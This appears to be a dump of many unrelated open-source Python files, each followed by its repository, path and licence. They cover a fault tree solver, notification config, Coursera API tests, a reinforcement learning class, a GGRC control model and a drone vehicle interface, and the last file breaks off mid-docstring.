try:
ft.remove_edge("SOLUTION_TOP",comb[1])
except:
pass
def solve(ft):
# identify top gate
for node in networkx.nodes(ft):
if ft.node[node]["top"] == 1:
top = node
break
print top
tmp = ft.node[top]["gtype"]
solution_top = "SOLUTION_TOP"
ft.add_node(solution_top, gtype="OR", module = "", top=2) # 2 means solution top
ft.add_node("CS_TOP_1",gtype = "AND", module = "", top = 3) # 3 means it holds a cutset
ft.add_edge(solution_top,"CS_TOP_1")
ft.add_edge("CS_TOP_1", top)
# now ready to start iterating
counter = 1
iter_count = 0
while 1:
cs_tops = ft.successors(solution_top)
iter_count += 1
print "Iter count", iter_count
new_cs_tops = []
gate_count = 0
for cs_top in cs_tops:
cs_entries = ft.successors(cs_top)
for cs_entry in cs_entries:
if ft.node[cs_entry]["gtype"] == "AND":
gate_count += 1
# need to disconnect the entry and connect its children
children = ft.successors(cs_entry)
for child in children:
ft.add_edge(cs_top, child)
ft.remove_edge(cs_top, cs_entry)
if ft.node[cs_entry]["gtype"] == "OR":
gate_count += 1
# or gate leads to adding new cs_tops
children = ft.successors(cs_entry)
done_first = 0
for child in children:
if done_first == 0:
# add first child to current cs top
ft.add_edge(cs_top, child)
ft.remove_edge(cs_top, cs_entry)
done_first += 1
else:
# otherwise generate new tops
counter += 1
s = "CS_TOP_" + str(counter)
print "CS top to add:", s
tmp = [s]
tmp.append(child)
for tmp_entry in cs_entries:
if tmp_entry != cs_entry:
tmp.append(tmp_entry)
new_cs_tops.append(tmp)
# add extra nodes
for entry in new_cs_tops:
ft.add_node(entry[0])
ft.add_edge(solution_top, entry[0])
for cs_entry in entry[1:]:
ft.add_edge(entry[0], cs_entry)
minimalise(ft)
print "Gate count =", gate_count
if gate_count == 0: # this is how we get out!
break
def createFT():
ft = networkx.DiGraph()
# create gates
ft.add_node("G1", gtype = "AND", module="", top=1, ref_count = 0)
ft.add_node("G2", gtype = "OR", module="", top=0, ref_count = 0)
ft.add_node("G3", gtype = "AND", module="", top=0, ref_count = 0)
#ft.add_node("G4", gtype = "OR", module="", top=0, ref_count = 0)
#ft.add_node("G5", gtype = "OR", module="", top=0, ref_count = 0)
# create BEs
ft.add_node("BE1", gtype = "BE")
ft.add_node("BE2", gtype = "BE")
ft.add_node("BE3", gtype = "BE")
ft.add_node("BE4", gtype = "BE")
ft.add_node("BE5", gtype = "BE")
ft.add_node("BE6", gtype = "BE")
ft.add_node("BE7", gtype = "BE")
# add inputs (add edges) - from (gate) to (input)
ft.add_edge("G1","BE1")
ft.add_edge("G1","G2")
ft.add_edge("G2","BE2")
ft.add_edge("G2","BE3")
ft.add_edge("G2","G3")
ft.add_edge("G3","BE3")
ft.add_edge("G3","BE2")
ft.add_edge("G3","BE4")
#ft.add_edge("G4","BE4")
#ft.add_edge("G4","BE6")
#ft.add_edge("G4","BE7")
#ft.add_edge("G5","BE5")
#ft.add_edge("G5","BE2")
for n in networkx.nodes(ft):
ft.node[n]["ref_count"] = len(ft.predecessors(n))
print n, ft.node[n]["ref_count"]
return ft
################## tree class is used as interface to frontend #####
class tree:
def __init__(self):
self.ft = createFT()
## end method ##
def create_from_ft(self, f):
pass
def print_tree(self):
#print networkx.info(ft)
#print networkx.nodes(ft)
# print out tree
cs_tops = ft.successors("SOLUTION_TOP")
for cs_top in cs_tops:
print cs_top,
cs_entries = ft.successors(cs_top)
for entry in cs_entries:
print entry,
print
networkx.draw(ft)
plt.show()
## end method ##
def print_gate(self, name=None):
pass
## end method ##
def solve(self, gate=None):
solve(self.ft)
## end method ##
| pboneham/fault_tree_solver | fault_tree_nwx.py | Python | agpl-3.0 | 6,929 |
# encoding: utf-8
def fizzbuzz(number):
pass
| haikoschol/kata_quickstart | python/kata.py | Python | mit | 51 |
from .main import Boxcar2
def start():
return Boxcar2()
config = [{
'name': 'boxcar2',
'groups': [
{
'tab': 'notifications',
'list': 'notification_providers',
'name': 'boxcar2',
'options': [
{
'name': 'enabled',
'default': 0,
'type': 'enabler',
},
{
'name': 'token',
'description': ('Your Boxcar access token.', 'Can be found in the app under settings')
},
{
'name': 'on_snatch',
'default': 0,
'type': 'bool',
'advanced': True,
'description': 'Also send message when movie is snatched.',
},
],
}
],
}]
| entomb/CouchPotatoServer | couchpotato/core/notifications/boxcar2/__init__.py | Python | gpl-3.0 | 893 |
from setuptools import setup
setup(
name='scrutiny',
version='0.0.1',
description='',
author='Luke Macken',
author_email='lmacken@redhat.com',
url='https://github.com/lmacken/scrutiny',
install_requires=["fedmsg"],
packages=[],
entry_points="""
[moksha.consumer]
scm_consumer = scrutiny.scm_consumer:SCMConsumer
""",
)
| lmacken/scrutiny | setup.py | Python | gpl-3.0 | 368 |
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(16, GPIO.IN)
count = 0
try:
while True:
inputValue = GPIO.input(16)
if (inputValue == True):
count = count + 1
print("Button pressed " + str(count) + " times.")
time.sleep(.3)
time.sleep(0.25)
except KeyboardInterrupt:
pass
GPIO.cleanup() | IanMezza/GPIO-101 | basicUsage/button.py | Python | mit | 327 |
import serial
import csv
ser = serial.Serial()
millis = 0
port = input('COM Port [10]: ') or 10
destination = input('Output File [./data.csv]: ') or './data.csv'
ser.port = int(port)
ser.open()
with open(destination, 'w', encoding='utf8', newline='') as f:
writer = csv.writer(f)
while True:
str = ser.readline()
millis += 1
print(str)
writer.writerow([str,millis])
| bmacdona9517/ISS-maintainSpeed | util/SerialLogger/SerialLogger.py | Python | mit | 412 |
"""
Test APIs.
"""
import json
import pytest
from mock import patch
from coursera import api
from coursera.test.utils import slurp_fixture
@pytest.fixture
def course():
course = api.CourseraOnDemand(session=None, course_id='0')
return course
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_no_instructions(get_page_json, course):
no_instructions = slurp_fixture('json/supplement-programming-no-instructions.json')
get_page_json.return_value = json.loads(no_instructions)
output = course.extract_links_from_programming('0')
assert {} == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_empty_instructions(get_page_json, course):
empty_instructions = slurp_fixture('json/supplement-programming-empty-instructions.json')
get_page_json.return_value = json.loads(empty_instructions)
output = course.extract_links_from_programming('0')
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert {} == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_one_asset(get_page_json, course):
one_asset_tag = slurp_fixture('json/supplement-programming-one-asset.json')
one_asset_url = slurp_fixture('json/asset-urls-one.json')
asset_json = json.loads(one_asset_url)
get_page_json.side_effect = [json.loads(one_asset_tag),
json.loads(one_asset_url)]
expected_output = {'pdf': [(asset_json['elements'][0]['url'],
'statement-pca')]}
output = course.extract_links_from_programming('0')
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_ondemand_programming_supplement_three_assets(get_page_json, course):
three_assets_tag = slurp_fixture('json/supplement-programming-three-assets.json')
three_assets_url = slurp_fixture('json/asset-urls-three.json')
get_page_json.side_effect = [json.loads(three_assets_tag),
json.loads(three_assets_url)]
expected_output = json.loads(slurp_fixture('json/supplement-three-assets-output.json'))
output = course.extract_links_from_programming('0')
output = json.loads(json.dumps(output))
# Make sure that SOME html content has been extracted, but remove
# it immeditely because it's a hassle to properly prepare test input
# for it. FIXME later.
assert 'html' in output
del output['html']
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_extract_links_from_lecture_assets_typename_asset(get_page_json, course):
open_course_assets_reply = slurp_fixture('json/supplement-open-course-assets-reply.json')
api_assets_v1_reply = slurp_fixture('json/supplement-api-assets-v1-reply.json')
get_page_json.side_effect = [json.loads(open_course_assets_reply),
json.loads(api_assets_v1_reply)]
expected_output = json.loads(slurp_fixture('json/supplement-extract-links-from-lectures-output.json'))
assets = ['giAxucdaEeWJTQ5WTi8YJQ']
output = course._extract_links_from_lecture_assets(assets)
output = json.loads(json.dumps(output))
assert expected_output == output
@patch('coursera.api.get_page_json')
def test_extract_links_from_lecture_assets_typname_url_and_asset(get_page_json, course):
"""
This test makes sure that _extract_links_from_lecture_assets grabs url
links both from typename == 'asset' and == 'url'.
"""
get_page_json.side_effect = [
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-1.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-2.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-3.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-4.json')),
json.loads(slurp_fixture('json/supplement-open-course-assets-typename-url-reply-5.json')),
]
expected_output = json.loads(slurp_fixture('json/supplement-extract-links-from-lectures-url-asset-output.json'))
assets = ['Yry0spSKEeW8oA5fR3afVQ',
'kMQyUZSLEeWj-hLVp2Pm8w',
'xkAloZmJEeWjYA4jOOgP8Q']
output = course._extract_links_from_lecture_assets(assets)
output = json.loads(json.dumps(output))
assert expected_output == output
| iemejia/coursera-dl | coursera/test/test_api.py | Python | lgpl-3.0 | 4,808 |
import numpy as np
from btgym.algorithms.utils import batch_stack, batch_gather, _show_struct
from btgym.research.gps.aac import GuidedAAC
from btgym.algorithms.runner.synchro import BaseSynchroRunner
class AACt2d(GuidedAAC):
"""
Trajectory2Distribution:
AAC class including methods enabling treating collected train data as empirical distribution rather than trajectory.
Note:
time_flat=True is a key ingredient here. See BaseAAC notes for details.
"""
def __init__(
self,
runner_config=None,
name='AAC_T2D',
**kwargs
):
try:
if runner_config is None:
kwargs['runner_config'] = {
'class_ref': BaseSynchroRunner,
'kwargs': {
'data_sample_config': {'mode': 0},
'name': 't2d_synchro',
},
}
else:
kwargs['runner_config'] = runner_config
kwargs.update(
{
'time_flat': True,
'name': name,
'_aux_render_modes': ('action_prob', 'value_fn', 'lstm_1_h', 'lstm_2_h'),
}
)
super(AACt2d, self).__init__(**kwargs)
self.on_policy_batch = None
self.off_policy_batch = None
self.rp_batch = None
except:
msg = 'AAC_T2D.__init__() exception occurred' + \
'\n\nPress `Ctrl-C` or jupyter:[Kernel]->[Interrupt] for clean exit.\n'
self.log.exception(msg)
raise RuntimeError(msg)
def get_episode(self, **kwargs):
"""
Get exactly one episode trajectory as single rollout. <-- DEAD WRONG
Args:
**kwargs: see env.reset() method
Returns:
"""
data_streams = [runner.get_episode(**kwargs) for runner in self.runners]
return {key: [stream[key] for stream in data_streams] for key in data_streams[0].keys()}
def get_batch(self, **kwargs):
"""
Retrieves batch of rollouts from runners.
Args:
**kwargs: see runner.get_batch() method.
Returns:
dictionary of batched rollouts
"""
rollouts = []
terminal_context = []
for runner in self.runners:
batch = runner.get_batch(**kwargs)
for rollout in batch['data']:
rollouts.append(rollout)
for context in batch['terminal_context']:
terminal_context.append(context)
self.log.debug('rollouts_len: {}'.format(len(rollouts)))
final_batch = {key: [rollout[key] for rollout in rollouts] for key in rollouts[0].keys()}
final_batch['terminal_context'] = terminal_context
return final_batch
@staticmethod
def sample_batch(batch, sample_size):
"""
Uniformly randomly samples mini-batch from (supposedly bigger) batch.
Args:
batch: nested dict of experiences
sample_size: mini-batch size
Returns:
nested dict of experiences of same structure as `batch` with number of experiences eq. to `sample_size`.
"""
if batch is not None:
batch_size = batch['time_steps'].shape[0]
indices = np.random.randint(0, batch_size, size=sample_size)
return batch_gather(batch, indices)
else:
return None
def process_batch(self, sess, data):
"""
Processes batched rollouts.
Makes every experience independent, enabling further shuffling or sampling.
Args:
sess: tf session obj.
data (dict): data dictionary
is_train (bool): is data provided are train or test
Returns:
on-policy [, off-policy and rp] processed batched data.
"""
# Process minibatch for on-policy train step:
on_policy_batch = self._process_rollouts(data['on_policy'])
if self.use_memory:
# Process rollouts from replay memory:
off_policy_batch = self._process_rollouts(data['off_policy'])
if self.use_reward_prediction:
# Rebalanced 50/50 sample for RP:
rp_rollouts = data['off_policy_rp']
rp_batch = batch_stack([rp.process_rp(self.rp_reward_threshold) for rp in rp_rollouts])
else:
rp_batch = None
else:
off_policy_batch = None
rp_batch = None
return on_policy_batch, off_policy_batch, rp_batch
@staticmethod
def _check(batch):
"""
Debug. utility.
"""
print('Got data_dict:')
for key in batch.keys():
try:
shape = np.asarray(batch[key]).shape
except:
shape = '???'
print('key: {}, shape: {}'.format(key, shape))
def process(self, sess, **kwargs):
"""
Usage example. Override.
"""
try:
# Collect train trajectories:
train_data_batch = self.get_batch(size=30, require_terminal=True)
self._check(train_data_batch)
#print('train_data_batch_ep_summary: ', train_data_batch['ep_summary'])
#print('train_data_batch_render_summary: ', train_data_batch['render_summary'])
# Process time-flat alike (~iid) to treat as empirical data distribution over train task:
self.on_policy_batch, self.off_policy_batch, self.rp_batch = self.process_batch(sess, train_data_batch)
#self._check(self.on_policy_batch)
print('on_p_batch_size: {}'.format(self.on_policy_batch['batch_size']))
# Perform updates to
# Sample random batch of train data from train task:
on_policy_mini_batch = self.sample_batch(self.on_policy_batch, 17)
#self._check(on_policy_mini_batch)
print('on_p_mini_batch_size: {}'.format(on_policy_mini_batch['batch_size']))
feed_dict = self._get_main_feeder(sess, on_policy_mini_batch, None, None, True)
#self._check(feed_dict)
except:
msg = 'process() exception occurred' + \
'\n\nPress `Ctrl-C` or jupyter:[Kernel]->[Interrupt] for clean exit.\n'
self.log.exception(msg)
raise RuntimeError(msg)
| Kismuz/btgym | btgym/research/metalearn_2/_aac_t2d.py | Python | lgpl-3.0 | 6,491 |
# -*- coding: utf-8 -*-
from domo import DomoDB, DomoSensor, DomoListener, DomoLog, DomoWatchdog
from multiprocessing import Process
import sys
class DomoApp:
def __init__(self):
pass
def run(self):
'''starting the threads, of course first the listener, then
the watchdog'''
# self.listener_process = Process(target=self.start_listener)
# self.listener_process.daemon = True
# self.listener_process.start()
self.watchdog_process = Process(target=self.start_watchdog)
self.watchdog_process.daemon = True
self.watchdog_process.start()
def start_listener(self):
'''method which starts the DomoListener thread'''
try:
mylistener = DomoListener.DomoListener()
mylistener.run()
except:
print "FATAL: {0}".format(sys.exc_info()[0])
return 1
def start_watchdog(self):
'''method which starts the DomoWatchdog thread'''
try:
mywatchdog = DomoWatchdog.DomoWatchdog()
mywatchdog.run()
except:
print "FATAL: {0}".format(sys.exc_info()[0])
return 1
def cleanup(self):
DomoLog.log('INFO', 'app', 'exiting')
| iFabio2/domo | src/domo/DomoApp.py | Python | apache-2.0 | 1,244 |
#!/usr/bin/env python
from setuptools import setup
short_description = 'Robot Framework Jalali Date'
try:
description = open('README.rst').read()
except IOError:
description = short_description
classifiers = """
Development Status :: 5 - Production/Stable
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.7
Topic :: Software Development :: Testing
Topic :: Software Development :: Quality Assurance
""".strip().splitlines()
setup(
name='robotframework-jalali',
package_dir={'': 'robotframework-jalali'},
packages=['jalaliLibrary'], # this must be the same as the name above
version='0.1.1',
description=short_description,
author='samira esnaashari',
author_email='samir.esnaashari@gmail.com',
url='https://github.com/samira-esnaashari/robotframework-jalali',
download_url='https://pypi.python.org/pypi/robotframework-jalali',
keywords=('robotframework testing '
'test automation testautomation '
'atdd bdd jalali'), # arbitrary keywords
install_requires=[],
long_description=description,
license='MIT',
classifiers=classifiers,
platforms='any'
) | samira-esnaashari/robotframework-jalali | setup.py | Python | mit | 1,208 |
#-*- coding:utf-8 -*-
import subprocess
from ErrorGenerator import ErrorGenerator
class PerlErrorGenerator(ErrorGenerator):
command = ["perl", "-wc"]
startFilePath = False
parseRegex = "(.*) line ([0-9]+)\.$"
lineIndex = 2
messageIndex = 1
stdout = None
stderr = subprocess.PIPE
| utisam/gfly | gfly/generators/PerlErrorGenerator.py | Python | gpl-3.0 | 287 |
import os,sys,glob
TSPROOT = os.getcwd()
XTOSDEFAULTS="W:\\bin\\XTOS\\4.1.P01"
TSPCLASSPATH = ''
TSPCLASSPATH += TSPROOT + '\\classes;'
#adding library files for TSP
TSPLIBPath = TSPROOT + '\\lib'
print TSPLIBPath
TSPCLASSPATH += ';'.join(['%s\\%s'%(TSPLIBPath,jar) for jar in glob.glob1(TSPLIBPath,'*.jar')])
TSPCLASSPATH += ';'
TSPCLASSPATH += XTOSDEFAULTS + '\\corba-java;'
TSPCLASSPATH += XTOSDEFAULTS + '\\native-java;'
TSPCLASSPATH += XTOSDEFAULTS+'\\java;'
TSPCLASSPATH += XTOSDEFAULTS+'\\bin'
varString = ''
varString += '-DTSPCLASSPATH=' + TSPCLASSPATH + ' '
varString += '-DTSPXMLPATH=' + TSPROOT + '\\..\\CPGTSPXML\\TSPMain.xml' + ' '
varString += '-DNLDXMLPATH=' + TSPROOT + '\\..\\CPGTSPXML\\NLDConfig.xml' + ' '
varString += '-DTSPHOME=' + TSPROOT + ' '
varString += '-DCLASSPATH=' + TSPCLASSPATH + ' '
os.environ['CLASSPATH']=TSPCLASSPATH
#java_str ="start javaw " + varString + " tspStarter"
java_str ="java -Xmx128M " + varString + " tspStarter"
print java_str
os.system(java_str)
| guanghaofan/MyTSP | 2.1.1.2/CPGTSP/reStartTSP.py | Python | gpl-2.0 | 1,009 |
from django.conf.urls.defaults import patterns, url
import views
urlpatterns = patterns('',
url('^openid/login/$', views.login, name="openid_login"),
url('^openid/callback/$', views.callback),
)
| GinnyN/towerofdimensions-django | django-allauth/build/lib/allauth/socialaccount/providers/openid/urls.py | Python | bsd-3-clause | 266 |
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Module for control model and related classes."""
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import validates
from ggrc import db
from ggrc.models.audit_object import Auditable
from ggrc.models.categorization import Categorizable
from ggrc.models.category import CategoryBase
from ggrc.models.mixins import BusinessObject
from ggrc.models.mixins import CustomAttributable
from ggrc.models.mixins import Hierarchical
from ggrc.models.mixins import TestPlanned
from ggrc.models.mixins import Timeboxed
from ggrc.models.deferred import deferred
from ggrc.models.object_document import Documentable
from ggrc.models.object_owner import Ownable
from ggrc.models.object_person import Personable
from ggrc.models.option import Option
from ggrc.models.person import Person
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.track_object_state import HasObjectState
from ggrc.models.track_object_state import track_state_for_class
from ggrc.models.utils import validate_option
class ControlCategory(CategoryBase):
__mapper_args__ = {
'polymorphic_identity': 'ControlCategory'
}
_table_plural = 'control_categories'
class ControlAssertion(CategoryBase):
__mapper_args__ = {
'polymorphic_identity': 'ControlAssertion'
}
_table_plural = 'control_assertions'
class ControlCategorized(Categorizable):
@declared_attr
def categorizations(cls):
return cls.declare_categorizable(
"ControlCategory", "category", "categories", "categorizations")
_publish_attrs = [
'categories',
PublishOnly('categorizations'),
]
_include_links = []
_aliases = {
"categories": {
"display_name": "Categories",
"filter_by": "_filter_by_categories",
},
}
@classmethod
def _filter_by_categories(cls, predicate):
return cls._filter_by_category("ControlCategory", predicate)
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(ControlCategorized, cls).eager_query()
return query.options(
orm.subqueryload('categorizations').joinedload('category'),
)
class AssertionCategorized(Categorizable):
@declared_attr
def categorized_assertions(cls):
return cls.declare_categorizable(
"ControlAssertion", "assertion", "assertions",
"categorized_assertions")
_publish_attrs = [
'assertions',
PublishOnly('categorized_assertions'),
]
_include_links = []
_aliases = {
"assertions": {
"display_name": "Assertions",
"filter_by": "_filter_by_assertions",
},
}
@classmethod
def _filter_by_assertions(cls, predicate):
return cls._filter_by_category("ControlAssertion", predicate)
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(AssertionCategorized, cls).eager_query()
return query.options(
orm.subqueryload('categorized_assertions').joinedload('category'),
)
class Control(HasObjectState, Relatable, CustomAttributable, Documentable,
Personable, ControlCategorized, AssertionCategorized,
Hierarchical, Timeboxed, Ownable, Auditable,
TestPlanned, BusinessObject, db.Model):
__tablename__ = 'controls'
company_control = deferred(db.Column(db.Boolean), 'Control')
directive_id = deferred(
db.Column(db.Integer, db.ForeignKey('directives.id')), 'Control')
kind_id = deferred(db.Column(db.Integer), 'Control')
means_id = deferred(db.Column(db.Integer), 'Control')
version = deferred(db.Column(db.String), 'Control')
documentation_description = deferred(db.Column(db.Text), 'Control')
verify_frequency_id = deferred(db.Column(db.Integer), 'Control')
fraud_related = deferred(db.Column(db.Boolean), 'Control')
key_control = deferred(db.Column(db.Boolean), 'Control')
active = deferred(db.Column(db.Boolean), 'Control')
principal_assessor_id = deferred(
db.Column(db.Integer, db.ForeignKey('people.id')), 'Control')
secondary_assessor_id = deferred(
db.Column(db.Integer, db.ForeignKey('people.id')), 'Control')
principal_assessor = db.relationship(
'Person', uselist=False, foreign_keys='Control.principal_assessor_id')
secondary_assessor = db.relationship(
'Person', uselist=False, foreign_keys='Control.secondary_assessor_id')
kind = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.kind_id) == Option.id, '
'Option.role == "control_kind")',
uselist=False)
means = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.means_id) == Option.id, '
'Option.role == "control_means")',
uselist=False)
verify_frequency = db.relationship(
'Option',
primaryjoin='and_(foreign(Control.verify_frequency_id) == Option.id, '
'Option.role == "verify_frequency")',
uselist=False)
@staticmethod
def _extra_table_args(_):
return (
db.Index('ix_controls_principal_assessor', 'principal_assessor_id'),
db.Index('ix_controls_secondary_assessor', 'secondary_assessor_id'),
)
# REST properties
_publish_attrs = [
'active',
'company_control',
'directive',
'documentation_description',
'fraud_related',
'key_control',
'kind',
'means',
'verify_frequency',
'version',
'principal_assessor',
'secondary_assessor',
]
_sanitize_html = [
'documentation_description',
'version',
]
_include_links = []
_aliases = {
"url": "Control URL",
"kind": {
"display_name": "Kind/Nature",
"filter_by": "_filter_by_kind",
},
"means": {
"display_name": "Type/Means",
"filter_by": "_filter_by_means",
},
"verify_frequency": {
"display_name": "Frequency",
"filter_by": "_filter_by_verify_frequency",
},
"fraud_related": "Fraud Related",
"principal_assessor": {
"display_name": "Principal Assessor",
"filter_by": "_filter_by_principal_assessor",
},
"secondary_assessor": {
"display_name": "Secondary Assessor",
"filter_by": "_filter_by_secondary_assessor",
},
"key_control": {
"display_name": "Significance",
"description": "Allowed values are:\nkey\nnon-key\n---",
}
}
@validates('kind', 'means', 'verify_frequency')
def validate_control_options(self, key, option):
desired_role = key if key == 'verify_frequency' else 'control_' + key
return validate_option(self.__class__.__name__, key, option, desired_role)
@classmethod
def _filter_by_kind(cls, predicate):
return Option.query.filter(
(Option.id == cls.kind_id) & predicate(Option.title)
).exists()
@classmethod
def _filter_by_means(cls, predicate):
return Option.query.filter(
(Option.id == cls.means_id) & predicate(Option.title)
).exists()
@classmethod
def _filter_by_principal_assessor(cls, predicate):
return Person.query.filter(
(Person.id == cls.principal_assessor_id) &
(predicate(Person.name) | predicate(Person.email))
).exists()
@classmethod
def _filter_by_secondary_assessor(cls, predicate):
return Person.query.filter(
(Person.id == cls.secondary_assessor_id) &
(predicate(Person.name) | predicate(Person.email))
).exists()
@classmethod
def _filter_by_verify_frequency(cls, predicate):
return Option.query.filter(
(Option.id == cls.verify_frequency_id) & predicate(Option.title)
).exists()
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Control, cls).eager_query()
return cls.eager_inclusions(query, Control._include_links).options(
orm.joinedload('directive'),
orm.joinedload('principal_assessor'),
orm.joinedload('secondary_assessor'),
)
def log_json(self):
out_json = super(Control, self).log_json()
# so that event log can refer to deleted directive
if self.directive:
out_json["mapped_directive"] = self.directive.display_name
return out_json
track_state_for_class(Control)
| edofic/ggrc-core | src/ggrc/models/control.py | Python | apache-2.0 | 8,365 |
# Core imports
import copy
# Library imports
from dronekit import VehicleMode, LocationLocal, LocationGlobal, LocationGlobalRelative
# Package imports
from ..core.Threadable import Threadable
from ..geometry.Geometry_Spherical import Geometry_Spherical
class Vehicle(Threadable):
"""
Vehicle interface specification.
"""
@classmethod
def create(cls, arguments, geometry, import_manager, thread_manager, usb_manager):
"""
Create a `Vehicle` object from one of the subclass types.
`arguments` is an `Arguments` object that Vehicle subclasses can use to
deduce settings from. `geometry` is a Geometry object of the space that
the vehicle operates in. `import_manager` is an `Import_Manager` for
deducing the location of the vehicle module. The `thread_manager` allows
any worker threads to be registered in the `Thread_Manager`. Finally,
the `usb_manager` argument is an instance of `USB_Manager` where certain
peripherals can be loaded, e.g. for communicating with an external motor
controller attached via a TTL device.
Returns an initialized object that is a subclass of `Vehicle`.
"""
settings = arguments.get_settings("vehicle")
vehicle_class_name = settings.get("vehicle_class")
vehicle_class = import_manager.load_class(vehicle_class_name,
relative_module="vehicle")
return vehicle_class(arguments, geometry, import_manager,
thread_manager, usb_manager)
def __init__(self, arguments, geometry, import_manager, thread_manager, usb_manager):
"""
Initialize the vehicle.
"""
super(Vehicle, self).__init__("vehicle", thread_manager)
self._geometry = geometry
self._home_location = None
self._mode = VehicleMode("PLACEHOLDER")
self._armed = False
self._servos = {}
self._attribute_listeners = {}
def setup(self):
"""
Set up preliminary backend requirements for the vehicle.
"""
pass
@property
def use_simulation(self):
"""
Check whether we want to use a simulated environment for this vehicle.
This can depend on settings or the Vehicle class itself.
"""
raise NotImplementedError("Subclasses must implement `use_simulation` property")
@property
def home_location(self):
"""
Retrieve the home location object.
This property returns a fresh `Location` object. The location type can
depend on the vehicle type and the vehicle's geometry.
"""
raise NotImplementedError("Subclasses must implement `home_location` property")
@home_location.setter
def home_location(self, position):
"""
Change the home location to another `Location` object.
The location `position` need not be a `LocationGlobal` object, but exact
handling of other types may depend on the vehicle type and the vehicle's
geometry.
An updated location also results in a notification to the attribute
listeners with a fresh `Location` object.
"""
self._home_location = copy.copy(position)
self.notify_attribute_listeners('home_location', self._home_location)
def set_home_state(self, position, yaw=0.0):
"""
Change the home location to another `Location` object `position` and
the expected yaw attitude to another `yaw`.
For vehicles that make use of a home attitude, either to know their
initial orientation compared to the geometry or to know how to orient
themselves upon returning to its home location, this method allows one
to keep track of both the home location and the yaw.
"""
self.home_location = position
@property
def mode(self):
"""
Get the vehicle mode.
The mode is returned as a `VehicleMode` object with a `name` property.
"""
return self._mode
@mode.setter
def mode(self, value):
"""
Set the vehicle mode.
The mode must be a `VehicleMode` object.
"""
self._mode = value
@property
def armed(self):
"""
Check whether the vehicle is armed.
An armed vehicle is ready to move around or is currently moving.
"""
return self._armed
@armed.setter
def armed(self, value):
"""
Arm or disarm the vehicle by setting a boolean `value` to its state.
"""
self._armed = value
def pause(self):
"""
Stop the vehicle such that it attempts to remain in place.
The vehicle should stop any actions fairly quickly upon a pause.
Mission objectives such as moving to waypoints are frozen, i.e., they
are not actively sought after. The vehicle may be unpaused by changing
its vehicle mode to a new mode. The vehicle may automatically disarm
itself during its paused state, but this should not endanger itself or
make it impossible to continue later on.
"""
raise NotImplementedError("Subclasses must implement `pause()`")
def update_mission(self):
"""
Propagate any updates to mission attributes, such as waypoints and
home location, to backend vehicle control, internal properties and
listeners.
This method can also print any information about mission attributes.
"""
pass
def add_takeoff(self, altitude):
"""
Add a command to take off to a certain `altitude` in the mission.
If the Vehicle backend does not support takeoff commands, this method
is a no-op and should return `False` to indicate no command was added
to the list of waypoints.
"""
return False
def add_waypoint(self, location):
"""
Add a waypoint to move to a specified `location` in the mission.
The waypoints added are supposed to be followed in order of the calls
to this method. The use of the waypoints depends of the vehicle mode.
The `location` is a Location object.
"""
raise NotImplementedError("Subclasses must implement `add_waypoint(location)`")
def add_wait(self):
"""
Add a command to wait after reaching a previous waypoint command.
The vehicle waits indefinitely after reaching this location, unless
the waypoint is manually adjusted using `set_next_waypoint`.
"""
raise NotImplementedError("Subclasses must implement `add_wait()`")
def clear_waypoints(self):
"""
Clear any waypoints and other mission commands to the vehicle.
"""
raise NotImplementedError("Subclasses must implement `clear_waypoints()`")
def is_wait(self):
"""
Check if the current waypoint is a wait command added via `add_wait`.
If the `Vehicle` does not support waypoints, or if the given `waypoint`
index number is incorrect, or the waypoint itself is invalid, e.g., it
was retrieved from a non-wait command, then the method must return
`False`.
"""
raise NotImplementedError("Subclasses must implement `is_wait()`")
def get_waypoint(self, waypoint=-1):
"""
Retrieve a waypoint from the list of vehicle waypoint commands.
The given `waypoint` is an index of the waypoint list.
If `waypoint` is `-1`, then return the waypoint that the vehicle should
reach "next" in the mission.
If the `Vehicle` does not support waypoints, or if the given `waypoint`
index number is incorrect, then this method must return `None`. If the
waypoint itself is invalid, e.g., it was retrieved from a non-waypoint
command, then the method may return `None` or some other value.
"""
raise NotImplementedError("Subclasses must implement `get_waypoint(waypoint)`")
def get_next_waypoint(self):
"""
Get the current waypoint number.
"""
raise NotImplementedError("Subclasses must implement `get_next_waypoint()`")
def set_next_waypoint(self, waypoint=-1):
"""
Set the current waypoint that we wish to reach.
The given `waypoint` is an index of the waypoint list.
If `waypoint` is `-1`, then set the waypoint index to the waypoint
after the current waypoint.
"""
raise NotImplementedError("Subclasses must implement `set_next_waypoint(waypoint)`")
def count_waypoints(self):
"""
Return the number of waypoints in the mission.
"""
raise NotImplementedError("Subclasses must implement `count_waypoints()`")
def check_arming(self):
"""
Perform final setup checks and make the vehicle ready to move.
This can wait for final backend instantiation, perform necessary checks
and finally arm the motors and put the vehicle in a controlled state.
"""
return True
def simple_takeoff(self, altitude):
"""
Take off to a certain relative altitude in meters.
If the Vehicle backend does not support taking off, this method
is a no-op and should return `False` to indicate that it is not taking
off. Otherwise, return `True` so that the caller can check whether it
reached the specified altitude.
"""
return False
def simple_goto(self, location):
"""
Set the target `location` of the vehicle to the given `Location` object.
"""
raise NotImplementedError("Subclasses must implement `simple_goto(location)`")
def is_location_valid(self, location):
"""
Check whether a given `location` is valid, i.e. it is populated with
a somewhat correct location. The default implementation checks whether
